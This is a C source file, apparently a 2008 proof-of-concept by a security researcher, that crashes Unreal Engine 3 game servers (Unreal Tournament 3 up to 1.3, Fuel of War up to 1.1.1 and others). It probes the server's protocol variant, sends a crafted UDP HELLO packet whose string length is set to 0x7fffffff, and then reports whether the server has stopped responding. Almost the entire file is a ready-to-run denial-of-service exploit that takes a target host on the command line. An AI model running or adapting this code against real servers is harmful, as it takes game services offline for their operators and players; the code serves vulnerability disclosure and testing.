/*
    Copyright 2008 Luigi Auriemma

    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307 USA

    http://www.gnu.org/licenses/gpl.txt
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <stdarg.h>
#include <ctype.h>
#include <time.h>
#include "rwbits.h"

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
    #define stristr strcasestr
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER         "0.1"
#define PORT        7777
#define BUFFSZ      1024    // the max supported is 576

#define GS2_QUERY   "\xfe\xfd\x00" "\x00\x00\x00\x00"                    "\xff\x00\x00" "\x00"
#define GS3_QUERY   "\xfe\xfd\x09" "\x00\x00\x00\x00"
#define GS3_QUERYX  "\xfe\xfd\x00" "\x00\x00\x00\x00" "\x00\x00\x00\x00" "\xff\x00\x00" "\x00"



int unreal_build_pck(int bug, u8 *buff, int pck, ...);
int unreal_info(struct sockaddr_in *peer);
int gs_handle_info(u8 *data, int datalen, int nt, int chr, int front, int rear, ...);
int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);



    /* unrealfp */



int     aafix           = 0,    // America's Army uses 0x800 instead of 0x3ff
        u3fix           = 0,    // Unreal 3 no longer uses index numbers
        rvfix           = 0,    // RavenShiel uses 0x50f instead of 0x3ff (this is useless since it's enough compatible with AA)
        pariahfix       = 0,    // Pariah
        movfix          = 0,    // Men of Valor
        first_time      = 1;



int read_unreal_index(u8 *index_num, int *ret) {
    int     len,
            result;
    u8      b0 = index_num[0],
            b1 = index_num[1],
            b2 = index_num[2],
            b3 = index_num[3],
            b4 = index_num[4];

    if(u3fix) {
        *ret = b0 | (b1 << 8) | (b2 << 16) | (b3 << 24);
        return(4);
    }

    result = 0;
    len    = 1;
    if(b0 & 0x40) {
        len++;
        if(b1 & 0x80) {
            len++;
            if(b2 & 0x80) {
                len++;
                if(b3 & 0x80) {
                    len++;
                    result = b4;
                }
                result = (result << 7) | (b3 & 0x7f);
            }
            result = (result << 7) | (b2 & 0x7f);
        }
        result = (result << 7) | (b1 & 0x7f);
    }
    result = (result << 6) | (b0 & 0x3f);
    if(b0 & 0x80) result = -result;
    *ret = result;
    return(len);
}



int write_unreal_index(int number, u8 *index_num) {
    int     len,
            sign = 1;

    if(u3fix) {
        index_num[0] = number & 0xff;
        index_num[1] = (number >> 8) & 0xff;
        index_num[2] = (number >> 16) & 0xff;
        index_num[3] = (number >> 24) & 0xff;
        return(4);
    }

    if(number < 0) {
        number = -number;
        sign = -1;
    }

    len = 1;
    index_num[0] = (number & 0x3f);
    if(number >>= 6) {
        index_num[0] += 0x40;
        index_num[1] = (number & 0x7f);
        len++;
        if(number >>= 7) {
            index_num[1] += 0x80;
            index_num[2] = (number & 0x7f);
            len++;
            if(number >>= 7) {
                index_num[2] += 0x80;
                index_num[3] = (number & 0x7f);
                len++;
                if(number >>= 7) {
                    index_num[3] += 0x80;
                    index_num[4] = number;
                    len++;
                }
            }
        }
    }
    if(sign < 0) index_num[0] += 0x80;
    return(len);
}



u32 read_bitx(u32 bits, u8 *in, u32 *in_bits) {
    u32     ret;

    ret = read_bits(bits, in, *in_bits);
    *in_bits += bits;
    return(ret);
}



int read_bitmem(u8 *in, int inlen, u8 *out, int bits) {
    for(; inlen--; out++) {
        *out = read_bitx(8, in, &bits);
    }
    return(bits);
}



int write_bitmem(u8 *in, int inlen, u8 *out, int bits) {
    for(; inlen--; in++) {
        bits = write_bits(*in, 8, out, bits);
    }
    return(bits);
}



int write_unrnum(int num, u8 *buff, int bits) {
    int     len;
    u8      mini[5];

    len = write_unreal_index(num, mini);
    return(write_bitmem(mini, len, buff, bits));
}



int read_unrnum(int *num, u8 *buff, int bits) {
    u8      mini[5];

    *num = 0;
    read_bitmem(buff, 5, mini, bits);
    return(bits + (read_unreal_index(mini, num) << 3));
}



int write_unrser(int num, u8 *buff, int bits, int max) {    // forcompability with core.dll
    int     b;

    for(b = 1; b && (b < max); b <<= 1) {
        bits = write_bits((num & b) ? 1 : 0, 1, buff, bits);
    }
    return(bits);
}



int read_unrser(int *num, u8 *buff, int bits, int max) {    // forcompability with core.dll
    int     b;

    *num = 0;
    for(b = 1; b && (b < max); b <<= 1) {
        if(read_bitx(1, buff, &bits)) *num += b;
    }
    return(bits);
}



u8 *unreal_parse_pck(u8 *buff, int size, int *chall) {
    static int  retfix  = 0,
                done    = 0;
    static u8   str[BUFFSZ];
    int     b,
            btmp,
            blen,
            bsize,
            len,
            pck,
            val3ff,
            val8,
            val1000,
            n,
            n1,
            n2,
            n3,
            n4;

    val8 = 0x8;
    if(pariahfix) val8 = 0x4;
    val3ff = 0x3ff;
    if(aafix) val3ff = 0x800;
    if(rvfix) val3ff = 0x50f;   // takes the same number of bits of AA... it's useless
    val1000 = 0x1000;
    if(movfix) val1000 = 0x1e00;

    if(size <= 0) return(NULL);
    n = buff[size - 1];
    if(!n) return(NULL);
    for(bsize = (size << 3) - 1; !(n & 0x80); n <<= 1, bsize--);

    b = read_unrser(&pck, buff, 0, 0x4000);
    while(b < bsize) {
        if(read_bitx(1, buff, &b)) {
            b = read_unrser(&n, buff, b, 0x4000);
            continue;
        }
        if(read_bitx(1, buff, &b)) {
            n1 = read_bitx(1, buff, &b);
            n2 = read_bitx(1, buff, &b);
        } else {
            n1 = n2 = 0;
        }
        n3 = read_bitx(1, buff, &b);
        b = read_unrser(&n, buff, b, val3ff);
        if(n3) b = read_unrser(&n, buff, b, 0x400);
        if(n1 || n3) {
            b = read_unrser(&n4, buff, b, val8);
        } else {
            n4 = 0;
        }

        b = read_unrser(&blen, buff, b, val1000);
        if((b + blen) > bsize) break;

        if(n4 != 1) {
            b += blen;
            continue;
        }

        for(btmp = b + blen; b < btmp;) {
            b = read_unrnum(&len, buff, b);
            if((len < 0) || (len > (sizeof(str) - 1))) break; 
            b = read_bitmem(buff, len, str, b);
            str[len] = 0;
            printf("  %s\n", str);
            if(!done) done++;
        }
        b = btmp;
    }

    if(!done) {
        retfix++;
        if(retfix == 1) return("NOFIX");
        if(retfix == 2) return("AAFIX");
        //if(retfix == 3) return("U3FIX"); already default
        if(retfix == 3) return("RVFIX");
        if(retfix == 4) return("PARIAHFIX");
        if(retfix == 5) return("MOVFIX");
        printf("\n"
            "Error: seems that this game requires a specific compatibility fix\n"
            "       try to relaunch this tool another time\n"
            "\n");
        exit(1);
    }
    return(NULL);
}



int unreal_send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int *chall, u8 **errmsg) {
    int     len;

    len = send_recv(sd, in, insz, out, outsz, peer, first_time);
    if(len < 0) {
        if(len == -1) std_err();
        *errmsg = NULL;
        return(-1);
    }

    if(first_time) first_time = 0;
    if(!out) return(0);

    *errmsg = unreal_parse_pck(out, len, chall);
    if(*errmsg) return(-1);
    return(len);
}



void activate_fix(int *fix) {
    u8      *str    = NULL;

    aafix       = 0;
    u3fix       = 0;
    rvfix       = 0;
    pariahfix   = 0;
    movfix      = 0;
    if(!fix) {
        printf("- deactivate the compatibility fixes\n");
        return;
    }
    *fix = 1;
    if(fix == &aafix)          str = "America's Army";
    else if(fix == &u3fix)     str = "Unreal 3 engine";
    else if(fix == &rvfix)     str = "Raven Shield";
    else if(fix == &pariahfix) str = "Pariah/Warpath";
    else if(fix == &movfix)    str = "Men of Valor";
    printf("- activate the %s compatibility fixes\n", str);
}



    /* unrealfp */



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    struct  linger  ling = {1,1};
    int     sd,
            len;
    u16     port    = PORT;
    u8      buff[BUFFSZ],
            *host,
            *errmsg;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "Server termination in Unreal engine 3 "VER"\n"
        "  Unreal Tournament 3 <= 1.3, Fuel of War <= 1.1.1 and more\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s <host> [port(%hu)]\n"
            "\n", argv[0], port);
        exit(1);
    }

    if(argc > 2) port = atoi(argv[2]);
    host = argv[1];

    peer.sin_addr.s_addr  = resolv(host);
    peer.sin_port         = htons(port);
    peer.sin_family       = AF_INET;

    printf("- target   %s : %hu\n", inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

    // not needed
    // if(port != 7777) unreal_info(&peer);

    activate_fix(&u3fix);

    printf("- check server type for possible compatibility fixes\n");
    for(;;) {
        sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
        if(sd < 0) std_err();   // required for scanning the fixes
        setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling));

        len = unreal_build_pck(0, buff, 0, "HELLO P=1 REVISION=0", NULL);
        len = unreal_send_recv(sd, buff, len, buff, BUFFSZ, &peer, NULL, &errmsg);
        if(len >= 0) break;
        close(sd);

        if(!errmsg) {
            continue;
        } else if(!strcmp(errmsg, "NOFIX")) {
            activate_fix(NULL);
        } else if(!strcmp(errmsg, "AAFIX")) {
            activate_fix(&aafix);
        } else if(!strcmp(errmsg, "U3FIX")) {
            activate_fix(&u3fix);
        } else if(!strcmp(errmsg, "RVFIX")) {
            activate_fix(&rvfix);
        } else if(!strcmp(errmsg, "PARIAHFIX")) {
            activate_fix(&pariahfix);
        } else if(!strcmp(errmsg, "MOVFIX")) {
            activate_fix(&movfix);
        } else {
            printf("\nError: \"%s\"\n", errmsg);
            exit(1);
        }
    }

    printf("- send malformed packet\n");
    len = unreal_build_pck(1, buff, 0, "HELLO P=1 REVISION=0", NULL);   // required by the game: "HELLO P="
    send_recv(sd, buff, len, NULL, 0, &peer, 0);
    send_recv(sd, buff, len, NULL, 0, &peer, 0);    // make sure it arrives

    close(sd);
    sleep(ONESEC);

    printf("- check server:\n");
    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();
    len = unreal_build_pck(0, buff, 0, "HELLO P=1 REVISION=0", NULL);
    if(send_recv(sd, buff, len, buff, BUFFSZ, &peer, 0) < 0) {
        printf("\n  Server IS vulnerable!!!\n");
    } else {
        printf("\n  Server doesn't seem vulnerable\n");
    }
    close(sd);
    return(0);
}



int unreal_build_pck(int bug, u8 *buff, int pck, ...) {
    va_list ap;
    int     b,
            sl,
            len,
            bpos,
            bsize,
            val3ff,
            val8,
            val1000;
    u8      *s;

        //devastation is not supported, it uses 0x4000 1 1 0x4000 1 1 1 1 0x3ff 0x1000 

    val8 = 0x8;
    if(pariahfix) val8 = 0x4;
    val3ff = 0x3ff;
    if(aafix) val3ff = 0x800;
    if(rvfix) val3ff = 0x50f;   // takes the same number of bits of AA... it's useless
    val1000 = 0x1000;
    if(movfix) val1000 = 0x1e00;

    b = 0;
    b = write_unrser(pck, buff, b, 0x4000);
    b = write_bits(0, 1, buff, b);
    if(!pck) {
        b = write_bits(1, 1, buff, b);  // 1
        b = write_bits(1, 1, buff, b);
        b = write_bits(0, 1, buff, b);
    } else {
        b = write_bits(0, 1, buff, b);  // 0
    }
    if(!pck) {
        b = write_bits(1, 1, buff, b);  // 1
        b = write_unrser(0, buff, b, val3ff);
        b = write_unrser(pck + 1, buff, b, 0x400);
        b = write_unrser(1, buff, b, val8);
    } else {
        b = write_bits(0, 1, buff, b);  // 0
        b = write_unrser(0, buff, b, val3ff);
    }

    bpos = b;
    b = write_unrser(0, buff, b, val1000);
    bsize = b;
    va_start(ap, pck);
    while((s = va_arg(ap, u8 *))) {
        sl = strlen(s) + 1;
        if(sl == 1) continue;               // skip empty
        b = write_unrnum(bug ? 0x7fffffff : sl, buff, b);
        b = write_bitmem(s, sl, buff, b);   // in reality they are index numbers
    }
    va_end(ap);
    write_unrser(b - bsize, buff, bpos, val1000);

    write_bits(0, 8, buff, b);  // zero pad
    len = b >> 3;
    if(!(buff[len] & 0x80)) buff[len] |= (1 << (b & 7));
    len++;
    return(len);
}



int unreal_info(struct sockaddr_in *peer) {
    u32     chall;
    int     sd,
            len,
            retver      = 0;
    u8      buff[4096],
            gs3[sizeof(GS3_QUERYX) - 1],
            *gamever    = NULL,
            *hostport   = NULL;

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    printf("- send info queries\n");
          send_recv(sd, GS2_QUERY, sizeof(GS2_QUERY) - 1, NULL, 0, peer, 0);
          send_recv(sd, GS3_QUERY, sizeof(GS3_QUERY) - 1, NULL, 0, peer, 0);
    len = send_recv(sd, NULL, 0, buff, sizeof(buff), peer, 0);
    if(len < 0) goto quit;
    if(buff[0] == 9) {
        memcpy(gs3, GS3_QUERYX, sizeof(GS3_QUERYX) - 1);
        chall = atoi(buff + 5);
        gs3[7]  = chall >> 24;
        gs3[8]  = chall >> 16;
        gs3[9]  = chall >>  8;
        gs3[10] = chall;
        len = send_recv(sd, gs3, sizeof(GS3_QUERYX) - 1, buff, sizeof(buff), peer, 0);
        if(len < 0) goto quit;
    }

    printf("\n- handle reply:\n");
    gs_handle_info(buff, len,
        0, '\0', 5, 0,
        "gamever",  &gamever,
        "hostport", &hostport,
        NULL,       NULL);

    if(gamever) {
        retver = atoi(gamever);
    }
    if(hostport && hostport[0]) {
        peer->sin_port = htons(atoi(hostport));
        printf("- set hostport %hu\n", ntohs(peer->sin_port));
    }

quit:
    close(sd);
    return(retver);
}



int gs_handle_info(u8 *data, int datalen, int nt, int chr, int front, int rear, ...) {
    va_list ap;
    int     i,
            args,
            found;
    u8      **parz,
            ***valz,
            *p,
            *limit,
            *par,
            *val;

    va_start(ap, rear);
    for(i = 0; ; i++) {
        if(!va_arg(ap, u8 *))  break;
        if(!va_arg(ap, u8 **)) break;
    }
    va_end(ap);

    args = i;
    parz = malloc(args * sizeof(u8 *));
    valz = malloc(args * sizeof(u8 **));

    va_start(ap, rear);
    for(i = 0; i < args; i++) {
        parz[i]  = va_arg(ap, u8 *);
        valz[i]  = va_arg(ap, u8 **);
        *valz[i] = NULL;
    }
    va_end(ap);

    found  = 0;
    limit  = data + datalen - rear;
    *limit = 0;
    data   += front;
    par    = NULL;
    val    = NULL;

    for(p = data; (data < limit) && p; data = p + 1, nt++) {
        p = strchr(data, chr);
        if(p) *p = 0;

        if(nt & 1) {
            if(!par) continue;
            val = data;
            printf("  %30s %s\n", par, val);

            for(i = 0; i < args; i++) {
                if(!stricmp(par, parz[i])) *valz[i] = val;
            }
        } else {
            par = data;
        }
    }

    free(parz);
    free(valz);
    return(found);
}



int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err) {
    int     retry = 2,
            len;

    if(in) {
        while(retry--) {
            //fputc('.', stdout);
            if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
              < 0) goto quit;
            if(!out) return(0);
            if(!timeout(sd, 2)) break;
        }
    } else {
        if(timeout(sd, 3) < 0) retry = -1;
    }

    if(retry < 0) {
        if(!err) return(-2);
        printf("\nError: socket timeout, no reply received\n\n");
        exit(1);
    }

    //fputc('.', stdout);
    len = recvfrom(sd, out, outsz, 0, NULL, NULL);
    if(len < 0) goto quit;
    return(len);
quit:
    if(err) std_err();
    return(-1);
}



int timeout(int sock, int secs) {
    struct  timeval tout;
    fd_set  fd_read;

    tout.tv_sec  = secs;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    if(select(sock + 1, &fd_read, NULL, NULL, &tout)
      <= 0) return(-1);
    return(0);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


